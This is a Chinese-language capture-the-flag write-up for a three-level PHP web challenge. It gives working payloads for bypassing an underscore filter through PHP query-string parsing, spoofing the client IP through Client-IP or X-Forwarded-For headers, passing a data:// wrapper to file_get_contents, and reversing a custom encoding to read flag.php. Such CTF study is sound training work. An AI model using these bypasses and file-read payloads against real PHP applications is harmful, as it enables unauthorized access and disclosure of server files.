考点
-
PHP解析字符串特性
-
PHP弱类型绕过
-
jother编码解码
-
Client-ip伪造ip
-
data://伪协议
-
change函数
第一关
<!--
//1st
$query = $_SERVER['QUERY_STRING'];if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){die('Y0u are So cutE!');
}if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){echo "you are going to the next ~";
}
!-->
倒着审计,第一个条件,首先以GET方式传入b_u_p_t,b_u_p_t的值不能为23333,但是如果正则匹配到23333,则跳转下一关,这个条件只需利用php弱类型绕过即可。第二个条件,$_SERVER['QUERY_STRING']将?后获取的值会赋给变量$query
条件如下,substr_count()函数会计算"_或%5f"在字符串中出现的次数满足或语句即可
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 )
举个例子
<?php$a="%20";if( substr_count($a, ' ') !== 0 || substr_count($a, '%20') != 0 ){
echo "yes";}
?>
前面提到的substr_count函数,所以get参数不能带下划线,我们可以用某些特殊字符来代替
PHP的字符串解析特性Bypass
PHP将查询字符串在URL或中文中转换为内部$GET或$POST,如/?foo=bar变成Array([foo] => "bar");但是查询字符串在解析的过程中会将某些字符删除或用下划线代替,如/?%20news[id%00=42会转换为Array([news_id] => 42),可见在解析字符时,会删除空白符,也将某些特殊字符转换为下划线(包括空格)
http://www.freebuf.com/articles/web/213359.html
payload:
/?b+u+p+t=23333%0a
第二关
右击查看源码
jother编码解码网址:JSFuck - 在线加解密
题目意思应该想以POST传入Merak随意赋值
第三关
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';//包含并执行flag.php,这应该是触发flag的最后一步if(isset($_POST['Merak'])){ highlight_file(__FILE__); die();
} //检测是否以post传入Merak,true则不执行下面代码function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
第一个判断:
先跳过change函数,$ip = getIp()用来获取客户端ip,如果符合$ip === '127.0.0.1'即可,这个条件很容易满足,利用X-Forwarded-For或Client-ip伪造即可,关键是第二个条件
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' )
file_get_contents函数把文件读入一个字符串,但是后面的值使用的单引号,并且中间使用===来判断,之后发现可以使用data://进行转换,格式为格式为data://text/plain;base64,先将todat is a happy day进行base64编码,得到dG9kYXQgaXMgYSBoYXBweSBkYXk=
初步payload为:/?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=且ip为127.0.0.1
第二个判断:
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file']));
我们需要利用file_get_contents触发flag.php的内容,但是这里的file_get_contents不会直接处理以get提交的file的值,利用change处理
function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re;
}
其实很简单,既然这样加密反着写就行
<?php
function unchange($v){ $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) - $i*2 ); } return $re;
}
$ganyu = unchange('flag.php');
echo $ganyu;
?>
再用base64编码,得到ZmpdYSZmXGI=,以get传入
payload:/?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=